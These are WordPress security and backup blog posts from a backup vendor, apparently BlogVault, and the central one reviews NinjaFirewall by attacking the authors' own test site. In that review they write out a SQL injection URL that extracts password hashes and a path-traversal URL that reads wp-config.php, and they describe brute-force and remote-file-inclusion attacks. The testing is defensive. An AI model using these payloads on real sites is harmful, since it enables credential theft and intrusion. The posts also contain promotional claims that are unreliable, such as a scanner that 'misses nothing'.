A screenshot of W3Total Cache from https://www.w3-edge.com
A screenshot of W3Total Cache from the W3 Edge website

 

This was because it had features that made it considerably better than other caching plugins, according to those who used it. Not only did the plugin caches every aspect of the WordPress site, from the HTML elements to objects in WordPress sites’ database, it also cached mobile cache well. Most other caching plugins only cached the HTML elements of a page, making their performance considerably lower.

The plugin, according to its page on the WordPress.org repository, has been used and trusted by companies websites AT&T, mashable.com, and pearsonified.com, amongst others.

About W3 Total Cache’s vulnerability

When the XSS vulnerability was reported, users of the plugin had already been complaining about support-related issues for six months, and had received no response  from the team that had developed it.

To add to this, the previous major ‘update’ to the plugin was only a simple change that made sure the plugin was compatible with the then latest versions of WordPress. Understandably there was concern over the potential damage this vulnerability could wreak if it was exploited.

But this wasn’t the first time the plugin had displayed vulnerabilities. Just as with any other plugin, W3 Total Cache had its share of loopholes, that were sometimes exploited, as with the case of other caching plugins like WP Super Cache too.

The good news

The silver lining in this situation, was the fact that the original developers of the plugin released an update six days after the vulnerability was disclosed. And not only did the update feature a patch for not just this exploitable loophole, but also another four more that were disclosed by SecuPress. Moreover, it also introduced a number of new features.

The bad news

However, a number of users of the W3 Total Cache who updated their versions of the plugin have reported that it breaks their sites, or renders some features useless.

What to do in case of an outdated plugin

This brings us to the most important course of action. When faced with a plugin or theme that is obviously out of date:

  1. Disable the plugin/theme until an update addressing the vulnerability has been released
  2. If it’s not a premium plugin or theme, follow its support forum on WordPress.org
  3. If an update with the patch for the vulnerability takes more than 48 hours to come through since the vulnerability is announced, try and contact the developer informing them about the vulnerability and quoting your sources.
  4. In the meanwhile, try and find alternatives that are compatible with your site in order to keep your site fully functional.
  5. If the update takes more than a month to come through, you could ask the community if someone would like to adopt the theme/plugin. Obviously this procedure has steps that you will have to follow, after communicating the problem to both, the WordPress team, and the community.

This is why it’s important to always have a backup plan: you never know when a plugin is going to stop being updated.

After all, a number of contributors are developers who contribute to the community as a hobby. It takes a lot of time and effort to not only create a plugin, but to identify how to patch up vulnerabilities and do it according to the best security practices as well.
Moreover, when the plugin/theme is actually updated, you never know if it’s going to break your WordPress site. Reliable backup solutions that allow you to test your backups before they go live on your site, are not just an option in such cases… they’re a necessity.

 

Making WordPress Backup to Dropbox seems like an attractive option due to ease of use & low cost.  However, is it the best practice & will restores be as easy as backups?

WordPress backup to Dropbox
Plugins generally store a copy of the API keys to your Dropbox account on your site. In such cases, if your WordPress site is hacked, then your backups maybe compromised too.

There are generally two ways you can make a WordPress backup to Dropbox. The first way requires two processes to be completed. You can manually download WordPress files using a FTP client and then download your WordPress database using phpMyAdmin. Then you can upload it all to Dropbox. WordPress.org recommends having at least three copies of a given backup and Dropbox can serve as the destination of one of those three copies.

The other way is seemingly easier. Backup your WordPress database and files with a backup plugin. Backup & Restore Dropbox, Dropbox Backup by Supsystic, and WordPress Backup to Dropbox are all plugins which backup to Dropbox.

Other plugins like Backup Guard, and UpdraftPlus WordPress Backup Plugin provide Dropbox as one of the optional destinations for backing up. IN the case of the the former the option is available only in the PRO version, where as in the case of the later it is an add on.

The process is simple You will need to input your Dropbox login credentials, confirm them and you are done. Some plugins will regularly backup your WordPress site to Dropbox according to the schedule you have set. Tracking this may be another matter altogether.

Apart from the simple process, cost is another factor which  makes Dropbox a seemingly attractive option for backups. Some plugins which allow you to backup your WordPress site to Dropbox are free. Dropbox itself is free up to 2 GB so you may feel there are no extra costs with this option.

WordPress Backup to Dropbox: Think again!

In order to backup up your WordPress site to Dropbox, plugins will need to store a copy of  your Dropbox account’s API key on the site itself. This means that you are keeping a spare key to your backups on your site. What is the point of leaving a copy of your bank vault’s key in your living room? You might as well have left your valuables in the living room too, right?

Backing up to Dropbox is indeed simple enough. Our WordPress backup plugin offers users the option to upload backup to Dropbox too. Users who know a particular version to be without any problems can download the backup to their Dropbox account. This is not a default option when you use the BlogVault plugin and regular backups are not made to your Dropbox account. We do this because we follow best practices for WordPress backups. Know more about why backups to Dropbox is not safe.

However, if you’re relying on Dropbox only to provide the safety net for your WordPress site then you are in trouble, at least according to our experience.

Dropbox Backups & Restores

Apart from all of these points, there is another issue to making WordPress backup to Dropbox only- restores. Afterall the entire point of making backups is to empower us when we need to restore our business or blog.

Most WordPress backup plugins zip your files; meaning they download your site in .zip or .gz files. You cannot view .zip or .gz files in Dropbox anyway and you have to download the files to sort them out. In this case Dropbox becomes a temporary storage solution rather than a comprehensive backup solution.

Seemingly simple matters like clutter. Regularly backing up to Dropbox clutters your account. You may not be able to find the files you desire quickly, when you need them. When you have to restore your site, you don’t want to sift through thousands, if not millions, of files.

Tip: When backing up to Dropbox

Ensure that you label the downloaded backups in an organised manner so that you know can categorise different backups. This will be helpful when you have to restore your site.

You need to safeguard your data in a more robust manner to ensure that in your hour of need you know not only know that you have access to backups but also that they are functional. Especially, if you’re running a small business or a popular blog then you might want to look at a more holistic solution for backup and continue making WordPress backup to Dropbox only as an additional step.

“Why do hackers hack websites?”, is one of the more philosophical questions of anyone with a website. Whatever the size of your WordPress site, protecting it from the common attacks against websites is definitely a concern.

Figuring out the best security option, (especially making the decision between a WordPress firewall and an antivirus) for your website requires a lot of research and technical know-how. But if you’ve decided on getting a WordPress firewall, NinjaFirewall is one of the options that you will have to consider.

This is why decided to test NinjaFirewall (v 3.2.4) for you, and to do it from a WordPress newbie’s point of view. We’ve pitted it against against the common exploits on WordPress sites to see if it stands our tests of fire.
A Web Application Firewall (or a WAF) provides customizable inspection and runs as an appliance, plugin, or a cloud-based service.

 

NinjaFirewall's logo
NinjaFirewall is a host-based WAF, that runs for WordPress.

 

Host-based firewalls on WordPress help protect against threats originating within the host (which, in this case, is your website). This means that they help reduce the risks of vulnerabilities in your website being exploited.

 

About NinjaFirewall

NinjaFirewall allows you to install and configure it just like a WordPress plugin, but it’s a ‘stand-alone’ plugin that intercepts all requests made to WordPress. The fact that it’s ‘stand-alone’ means it has its own settings, options, policies and rules that you can configure. If you’ve googled NinjaFirewall, you’d have seen phrases saying that the firewall ‘sits in front of WordPress’. This simply means that NinjaFirewall intercepts requests with the aim of alerting you of, and stopping any suspicious activity/requests before they affect your site.

There are also a few hiccups that you might face during installation, that the NinjaFirewall team has documentation for, which is great, if you aren’t a beginner with WordPress, and know the basics enough to understand code.

 

What NinjaFirewall Claims to Do for You

NinjaFirewall claims to intercept and determine which traffic to allow to your site. Upon installation, the firewall backs up your php.ini and .htaccess files and then modifies them to intercept every request made to your site. It then filters requests and traffic using extensive rules (and a whitelist), to separate good requests from malicious ones. The bad requests are dropped while normal requests are forwarded to your WordPress site. Its aim as a firewall, is to prevent your site from getting hacked, by avoiding bad requests from the get-go.

NinjaFirewall has a lot of features, that help towards this end, and many varied security functionalities to your site.

 

Features

NinjaFirewall has a lot of features, that help towards this end, and many varied security functionalities to your site.  Each feature of NinjaFirewall has different options and settings, and we hope to explain the most important ones below:

 

NinjaFirewall has a great-looking set of features
NinjaFirewall has a great-looking set of features

 

        1. Firewall Options

          This is where you enable or disable NinjaFirewall. You can also customize the error messages to be displayed on your site when the firewall detects a bad request.

           

          Firewall Options

          If you’ve got NinjaFirewall installed on another site and have configured it according to your needs, you can import it to a fresh installation in the Firewall Options section. The only requirement is that both sites should have the same versions of NinjaFirewall.
          Importing another configuration of NinjaFirewall will override any firewall-related rule, option or configuration that exists on the site you’re importing to.

        2. Firewall Policies
          Most of the options that control how NinjaFirewall works, are in the “Firewall Policies” section.
          None of these options are customizable though: the majority of them are Yes/No options, or have check-boxes. The first few options let you decide whether you only want traffic with an SSL certificate or you’re okay with traffic that comes from other sources. Since a lot of hacks originate from file uploads, the firewall also allows you to choose whether you want to allow them or not. These first few options are easy enough to configure:Firewall Policies for traffic and uploadsBut as you scroll down the list, they get more and more complex. Some options even caution the user to not click on them if the user doesn’t understand what they entail. NinjaFirewall has documentation to explain all of these options, but some of them might still need some technical knowledge. This is why we’re going to try and break it all down for you.The HTTP variable is what requests information from a web page.
          Scanning it for dangerous values is a great move, especially since hacks depend on GET, POST and REQUEST variables.
          Sanitizing these variables makes sure that the website interprets strings as such, and not as commands.Scanning and sanitizing the HTTP variables can keep you from a number of attacks
          These options keep out suspicious bots from crawling your site:

           

          NinjaFirewall tries its best to keep suspicious bots from your site.
          The HTTP response headers help in protecting your site from other hacks that originate from the browser’s end.

          These settings help NinjaFirewall help protect you from attacks that originate from your browser.

          There are also a few options that are unique to WordPress:

           

          These options help protect against SQL dumping, and a number of shell scripts.

          These help protect your site from SQL dumping ( i.e. creating a snapshot of and storing all of your website’s database files); as well as a number of shell scripts.When a hacker tries to attack your site, they make a number of attempts, and depend on error messages to determine whether their attack worked or not. NinjaFirewall has the following options to not let your site display revealing error messages:

           

          These options prevent hackers from using PHP wrappers to pass GET and POST requests. They also hide error messages.

          And then there are other ‘various’ options that you can enable:

           

          And then there are other 'various' options

          NinjaFirewall also has options that control the requests made to and the access to WordPress core files and directories:

           

          Options that control how the WordPress directories are handled

          This section is also where you can modify the firewall’s white-list:

           

          There are also options to control your WordPress site's whitelist

       

     

          1. File Check
            This feature helps create a ‘snapshot’ of files changed by comparing original files (or existing ones) against modifications. Once you create a snapshot (that you can later download or delete), it allows you to scan your site for file changes. You can not activate this scan before you create a snapshot.The File Check feature

         

          1. Anti-Malware
            The NinjaFirewall also has an Anti-Malware feature, that allows you to scan for hacks. According to NinjaFirewall’s documentation, this feature doesn’t alert you of spammy links, (like those that might redirect your visitors to porn sites). However, it does alert you based on signatures of malware, that could damage your site. This isn’t a great way to go about scanning sites though, especially since hacks are complex.This is probably why this is the one feature on NinjaFirewall that allows you to add custom rules or signatures, for malware or suspicious activity.

            NinjaFirewall has an interesting feature called Anti-Malware, that allows you to add custom malware signatures.
            NinjaFirewall has an interesting feature called Anti-Malware, that allows you to add custom malware signatures.

             

            NinjaFirewall has handy documentation for how to go about this. You will need to understand what to create signatures for, in order to make use of this feature.
            The Anti-Malware feature poses a couple of issue though. More on them here.

          2. Event Notifications
            The firewall logs any suspicious activity in the Firewall Log section, but you can set how often it alerts you, and what to alert you of:You can see exactly what triggers alertsThis way, if the Firewall blocks any attacks, you can see what happened, from the Firewall log. It’s always good to examine why/how it blocked the attack.and how often they come in.

         

     

          1. Login Protection
            Brute Force Attacks are a different thing altogether- NinjaFirewall has a separate option to help protect against these attacks: Login Protection.The option asks for HTTP authentication credentials, without which you can’t enable this option. You can also set the message displayed when the firewall blocks such attacks.
          2. Firewall Log
            It is what it sounds like: a log of everything NinjaFirewall found unusual, according to the rules you set in Firewall options. So if you’ve asked to be notified about any plugins updated, deleted or created, this log will contain all the details.
            NinjaFirewall's Firewall Log
          3. Live Log
            This feature monitors HTTP and HTTPS traffic on your site, so it aims at protecting against any traffic related attacks (like Brute Force, DDoS, or weird IPs trying to access your site.)
          4. Rules Editor
            NinjaFirewall has a set of ‘rules’ according to which it operates.NinjaFirewall has a list of in-built security rules.These rules are mostly signs, or signatures of attacks that it tries to prevent. According to NinjaFirewall’s documentation, the rules are downloaded from the WordPress.org repository, and the plugin doesn’t contact NinTech’s servers during the update process.The list that NinjaFirewall follows

             

            You can’t add your own rules, but you can modify them in the Firewall Policies section, if they’re greyed out in the drop-down.

          5. Updates
            This feature allows your installation of NinjaFirewall to be up to date. Setting the firewall up to check for security rules is a tradeoff between choosing your custom configuration, and keeping your site secure.
            Of course, you could ask to be notified about the changes and then go back to fix the changes so they suit your requirement though.
            This option checks for NFW updates

         

     

    What we tested it against

    We ran a series of tests to evaluate first-hand, the efficiency of NinjaFirewall, against some of the common attacks WordPress sites face. For this, we created a test-site (which would be the stand-in for your website): 139.59.28.51/wordpressThe vulnerabilities we tested the firewall against were:

    1. SQL Injection

    The Firestorm real-estate plugin (actually v 2.03), is one that contained a vulnerability that allowed for SQL Injection. This plugin allows you to add real estate listings to your WordPress site.

    Testing NinjaFirewall against SQL Injection

    To exploit this vulnerability, we tried accessing entering SQL code into the Firestorm plugin to get data from wp_users. (For those of us who don’t know what wp_user actually does, it allows you to get data from, and modify both the roles and capabilities of WordPress users other than the admin.)

    Here is the SQL code we used:

    139.59.28.51/wordpress/wp-content/plugins/fs-real-estate-plugin/search.php?ProvinceID=35335 UNION SELECT 1, user_pass, 3, 4, 5, 6, 7, 8 from wp_users.

    Because this version of the plugin in vulnerable, it will execute the code to try and select the user credentials from users 3, 4, 5, 6 and 7.

    We used this in our browser’s address bar.

    (Note: This is why for this attack and the couple others following, we’re going to ask you to look closely at the address bar.)

    Running the test in the address bar

    Once we entered the same code into the address bar of the browser, this is what showed up on the test site (look at the address bar carefully, please):

     

    NinjaFirewall doesn't take entering SQL code into the address bar very lightly.
    NinjaFirewall doesn’t take entering SQL code into the address bar very lightly.

     

    But how did things work out behind the scenes of the attack?

    Firewall Log for SQL Injection

    This is what NinjaFirewall’s Firewall Log had to show us:

    How NinjaFirewall logged the SQL Injection attack

     

    Looks like the firewall had this exploit already in its list in the Rules Editor section, and hence it detected the exploit and prevented it from occurring too.

    2. Arbitrary File Upload and Local File Inclusion (LFI)

    There were a couple of vulnerable plugins that came to mind when we thought of Local File Inclusion. One was Slider Revolution (v 3.05), and the other was Gravity Forms (< v 1.8.19).

    We chose Slider Revolution though, because it allowed to make both exploits, and because more than 100,000 sites were attacked in 2014 through this plugin.

    Testing NinjaFirewall against Local File Inclusion

    The Slider Revolution plugin was used to perform Local File Inclusion on vulnerable websites in the following manner:

    Say the vulnerable site was called ‘victim.com’.

    The vulnerability allowed attackers to request the RevSlider plugin on the vulnerable site to show the images in the slider. Once it did that, the attackers would also try to figure out the structure of the WordPress directory. They would then get it to include files on the website’s local server (like the wp_config files) to the files it revealed. So the final URL entered on the site would be something like:

    http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

    We used a very similar approach to try and get the plugin to include the wp_config files of the website, and to reveal them.

    Here is how NinjaFirewall reacted:

    Running the test

     

    NinjaFirewall on Local File Inclusion: You shall not pass!
    NinjaFirewall didn’t let us perform a Local File Inclusion.

     

    Since the action got blocked, we just checked out the Firewall Log.

    Firewall Log for Local File Inclusion

     

    What NinjaFirewall's Firewall Log registered the LFI attack as
    This is what NinjaFirewall had to say about the attempt to include a file locally to the test-site.

     

    Testing NinjaFirewall against Arbitrary File Upload

    Again, trying to get to two attacks with the same plugin, we tried uploading random (or arbitrary) files to the test site. If the attempt is successful, the damage to the site would depend on the kind of file uploaded, and what it was intended to do.

    Take a look at the address bar to see what we’ve tried to do.

    Now don’t get confused… We named the files to be uploaded as “revslider” so that it would be accepted more easily by the plugin.

    Running the test

     

    NinjaFirewall successfully blocks Arbitrary File Uploads.
    We used Google Chrome’s extension to test the Arbitrary File Upload exploit. The exploit was unsuccessful

     

    Again, we only checked out the Firewall Log, since this attack was unsuccessful.

    Firewall Log for Arbitrary File Upload

    Here is what the Firewall Log said:

     

    The Firewall Log for Arbitrary File Uploads
    The Firewall Log for Arbitrary File Uploads

     

    3. Brute Force Attacks

    As mentioned earlier, to protect against Brute Force attacks, NinjaFirewall has a separate option called Login Protection.

    Testing NinjaFirewall against Bruteforce attacks

    Just to test its effectiveness, a colleague of mine, Vijay, tried launching a Brute Force attack against the website using Hydra, a tool that helps test websites and crack admin credentials.

    Running the test

    We launched a Brute Force attack against the site when we’d set the “Enable Brute Force Attack Protection” to “No”. This is what Hydra got us:

    Hydra was able to get the admin credentials from the site

     

    As you can see, the attack was successful, and Vijay was able to get the site admin’s login credentials.

    Then, we went ahead and enabled the Login Protection feature:
    Setting Login Protection to 'Yes, if under attack'
    Vijay then launched the attack again. This is what Hydra’s log said:

    Hydra was unsuccessful

     

    Firewall Log
    A quick look at how the attack was reported in NinjaFirewall’s Firewall Log (this shows how the attack was let through, and then stopped):

    the Firewall Log for Brute Force Attacks

     

    4. Remote File Inclusion (RFI), Arbitrary Code Execution, and Backdoors (a custom hack)

    We used TimThumb because it was a plugin that was widely used, and exhibited a vulnerability that allowed for millions of WordPress sites to get hacked. This test was therefore meant to check the basics of the firewall.

    Testing NinjaFirewall against Remote File Inclusion and Arbitrary Code Execution

    For this, we used the (currently defunct) Pict.Mobi widget, that used TimThumb (v 1.28) on the test site. Obviously since the RFI exploit would need a hackfile to be included from a remote location, we also created another site that would host the bad file.
    We took the approach a hacker would: we first confirmed that the (test) site used TimThumb, and that it used a vulnerable version.

     

    "Does this site have TimThumb?"- An optimistic hacker
    Most hackers looks for vulnerable plugins on your site.

     

    Then selected a very small file (in this case, it was a 16X16 .png icon), and modified it to contain PHP code.

     

    Modifying a small image to contain malicious PHP code
    Modifying a small image to contain malicious PHP code

     

    Next we used the TimThumb vulnerability to include the file remotely to the test site. Note that the file was PHP, which means that any time it was accessed, it would run.

     

    Including the malicious file remotely to our website
    Including the malicious file remotely to our website (notice the address bar!)

     

    Sure, it was an image file, so it could easily bypass the site’s usual sensors, but the PHP code could still be accessed, and executed.

    Testing NinjaFirewall against Backdoors

    We wanted to kill three birds with one stone, so we made sure to create an encrypted shell for the PHP code on the image before we uploaded it.

    Running the test

    We then extracted the code from the hackfile shell, just like a hacker would:

     

    Extracting code from the hackfile's shell
    Extracting code from the hackfile’s shell

     

    And then ran it.

     

    Executing the code. A three-in-one attack.The website gave us what we wanted.
    Executing the code. A three-in-one attack. The website gave us what we wanted.

     

    NinjaFirewall didn’t stop the attack.

    We think it was because NinjaFirewall has a list of rules for what attacks should look like, in a section called Rules Editor.

     

    A look at NinjaFirewall's Rules Editor
    A look at NinjaFirewall’s Rules Editor

     

    Click on the drop-down, and you see the list of rules that NinjaFirewalls follows:

     

    The Rules Editor has an extensive list
    The Rules Editor has an extensive list

     

    These rules are internal to NinjaFirewall, so you can’t see what exactly each rule entails.

    The attack we performed though, didn’t exactly go by the rules of how the attacks worked.
    The results of the tests are as follows:

    Firewall Log

    The log didn’t pick up on the hack. In fact, it only listed the backdoor we’d tested it for.

     

    The Firewall Log only registered the backdoor.
    The Firewall Log only registered the backdoor.

     

    File Check

    The firewall didn’t detect changes in files. We were still able to list the files in the WordPress directory.

     

    The firewall didn’t detect changes in files. We were still able to list the files in the NinjaFirewall's File Check resultsdirectory.
    What NinjaFirewall’s File Check showed up

     

    Anti-Malware

    We didn’t expect this feature to remove the malware, because it’s only a scanner.

    Unfortunately, it didn’t find the infected files. We were under attack, and this is what the anti-malware feature said:

    What the Anti-Malware feature said
    What the Anti-Malware feature said

    Live Log

    No blips on this feature either.

    The results on Live Log
    The results on Live Log

    Unresolved issues with NinjaFirewall

    Since this is a review of the entirety of NinjaFirewall, we didn’t only test it against vulnerabilities. We also checked for issues other than those of protection. Most of these issues are documented on NinjaFirewall’s forum on WordPress, or on its online documentation.

    ● Anti-Malware scans time out

    The Anti-Malware feature on NinjaFirewall allows you to scan files in a particular directory for your site for malware (by default this is/var/www/html/wordpress/).

    The thing is, by default, this feature scans your site for malware in files that have been created or changed in the last 7 days. You can change the time period (or Timestamp) or even make it zero, in which case it scans your whole site.

    The options that Anti-Malware shows you
    The options that Anti-Malware shows you

    However, when if your website is on a shared host, there is one major problem you could face: the Anti-Malware scan timing out.
    The feature stops scanning your site after a certain time period that is set by your web host. This means that if you have too many files on your site, the scan will get cut short. Your site could never get fully scanned, unless you try some workarounds, (like this one suggested by the NinjaFirewall team). This is probably why NinjaFirewall’s Anti-Malware feature also has the two options of “Ignore file extensions” and “Ignore files/folders”:

    Working around NinjaFirewall's time-out issue
    Working around NinjaFirewall’s time-out issue

    While there isn’t anything NinjaFirewall can do to change the timing out of the scan, it is a huge drawback for users who want to scan their sites.

    ● The Anti-Malware feature uses only signatures to detect malware

    This is a widely-used method to identify malware and viruses, but it doesn’t catch everything. This is why most security scanners use it in combination with other approaches. Hacks utilize vulnerabilities on your site, but how bad code is run on your site depends completely on how hackers want to carry out the attack. So the ‘signature’ of malware could always be altered in small ways so as to escape detection. This is why, as we explained earlier, our exploit of the vulnerabilities in the Pict.Mobi plugin allowed for RFI, Arbitrary Code Execution and Backdoors on our test site.

    ● The firewall modifies .htaccess files

    NinjaFirewall backs up the PHP INI and .htaccess files that it has to modify, but modifying the .htaccess file in itself can wreak a lot of havoc on your site. The .htaccess file controls a lot on your WordPress site. One of its more obvious functions is access control (i.e. which users are allowed to your website), but it also dictates how files with certain extensions run on your site. This is why any minor slip-up with this file could cause your server to majorly malfunction. Just to be on the safer side, we recommend that you perform a backup of your entire site rather than just the .htaccess file. That way even if something breaks, you can always roll back to a working version of your site.

    ● Modifying the .htaccess files and php.ini files slows down your site

    .htaccess allows you access to the configuration of directories on your website even if you don’t have your hosting server’s (eg: Apache) main configuration file.

    This means, when your site is configured to direct traffic based on the modification made to .htaccess, Apache has to look for, and load all the .htaccess files on any request made to your site. As a result, your WordPress site’s load time increases.

    It’s a good way to direct traffic when your main server configuration file isn’t accessible, but otherwise it isn’t a great thing.

    ● The firewall interrupts backup operations regularly

    NinjaFirewall triggers false alarms when WordPress backup plugins are run, sometimes doesn’t allow backup plugins to backup the site. The firewall also has to be disabled before migrating your site to a new IP address.

    ● Can’t manually install NinjaFirewall

    As mentioned earlier, NinjaFirewall might log you out of your WordPress site and deny you access if you use an FTP client to make changes to it, or even uninstall it. Anything that you need to do with respect with this plugin has to be done from your WordPress dashboard.

    Verdict

    The NinjaFirewall seems like a powerful tool against known attacks that occur according to their signatures. But the thing is that most hackers know these signatures, and know that most security measures protect against these signatures. So they modify the signatures to perform more successful, and at times, most devastating attacks.

    Alerting of attacks after they’ve taken place isn’t something a lot of website owners can afford, especially with the damage hacks can wreck. However, having a hack-cleaner might help you scan for, and remove malware that causes the damage. In any case, it’s always important to have a dependable backup service for your WordPress site.
    Did you like this review of NinjaFirewall? Would you like to see other firewalls tested too? Let us know in the comments!

BlogVault has developed, and in collaboration with Pantheon created Pantheon Migrations. Pantheon is the world’s largest website management platform, delivering Drupal and WordPress as a service. Pantheon’s multi-tenant, container-based cloud platform enables web teams to build, launch, and run all of their websites from a single dashboard with ease. 

You can now migrate your WordPress sites to Pantheon with ease. Just input your SFTP credentials, email, and the destination URL, and you’re good to go. Pantheon will notify you when the migration begins and completes via email. You can also track the progress of the entire process on our website, via your BlogVault dashboard.

For us, at BlogVault this is the latest partnership for migrations. Previously we have partnered with other companies like WP Engine, Savii, & Cloudways. Now you can enjoy the convenience and expertise we strive to bring you while migrating to Pantheon as well.

easy WordPress migrations
BlogVault partners with Pantheon for easy WordPress migrations

You can always enjoy easy migrations with our backup plugin, BlogVault too. Apart from backup, and migrations, the plugin also offers, auto-restore, test-restore and security settings to improve your WordPress website security posture.

While the partnership adds an exciting page to BlogVault’s story, we’re also looking ahead. Our mission of developing the best in WordPress backup and security has led us to our next product. It’ll launch shortly and promises to change the way users deal with WordPress security issues on their sites. Until then, stay safe and don’t forget to backup!

Removing malware from your website, and getting rid of hacks is a painstaking process. When you’re a website owner whose site has been hacked, your online reputation takes a hit. It’s only more distressing when you keep getting hacked. The reason behind this, most of the time, is a ‘backdoor’.

Having a backdoor could be explained with some ease, by comparing it to something we could call a “spare-key situation”.

Suppose you had a spare key to your house, but you dropped it somewhere on your street. Someone creepy has found it, and unfortunately for you, this person also knows exactly where you live. Of course you don’t know about it, but you notice changes at home.

Whether all the furniture in your house is gone, or whether the sofa is always a little warmer in the morning depends entirely on what this person with the spare key is doing in your house. This means unless you change your locks or employ other security measures, this stranger has full access to your home, and will keep coming back.
keyboard-621830_1920

Hackers also do something similar when they hack WordPress sites.

When a hacker exploits a vulnerability and hacks a site, they want to be able to enter it again in the future. They also want to do so, without needing to put in the effort again. This becomes difficult though, if the site owner closes the vulnerability by updating the exploitable theme/plugin. That is why hackers leave behind code called backdoors on the site. This way, even if the vulnerability is fixed, the backdoor remains. Backdoors are inconspicuous, because the longer they stay hidden, the longer the attacker has a way to get back in.
Backdoors can give hackers complete control through Arbitrary Code Execution. One of the most common backdoors is ‘Filesman’. Since it’s feature-rich, it allows hackers to perform a variety of functions. However, there are others too, which might be just three-four words of code, but prove to be equally dangerous.

A lot of the time, backdoors are disguised as WordPress files, and are hidden by the hacker in a place only they know. You, as an admin, could find the file only if you combed through all the WordPress files. This is especially difficult because backdoors can go in so many different places.

Here are a few places backdoors are usually hidden on your WordPress site:

  1. In core WordPress folders: Adding a new file to, or modifying an existing file in a core WordPress folder (e.g. wp-includes or wp-admin or wp-content) can easily go unnoticed. Especially in the wp-includes folder, since it contains every file ever included to the site. This is why we noticed a lot of backdoors here.
  2. In new, innocent-looking folders: Hackers could add hackfiles to new files that look completely innocuous, like ./images/
  3. Plugins and Themes: Not many people bother to check these folders after the plugins/themes have been installed. This makes these folders a perfect target. Moreover, a lot of plugins have their own vulnerabilities. Another way hackers install backdoors, is by adding a new plugin to the site that looks normal, but is actually malware.

Just to give you a general idea, this is how you identify a backdoor (that looks like a plugin file):

Backdoor

These vulnerabilities are sneaky. They can be passed off by a number of malware scanners as legitimate files, because of the way they’re named. This is why it’s so difficult to identify backdoors.

Backdoors are especially infuriating because sometimes hackers choose to leave more than one of them, in many locations. So even if one was discovered, there would be another way in.
Accurate, efficient scanning and hack removal requires time, and technical assistance (which is expensive usually). If you’d like to test the only one-click, automated hack-cleaner that misses nothing, and sounds no false alarms, we suggest that you try MalCare, for free.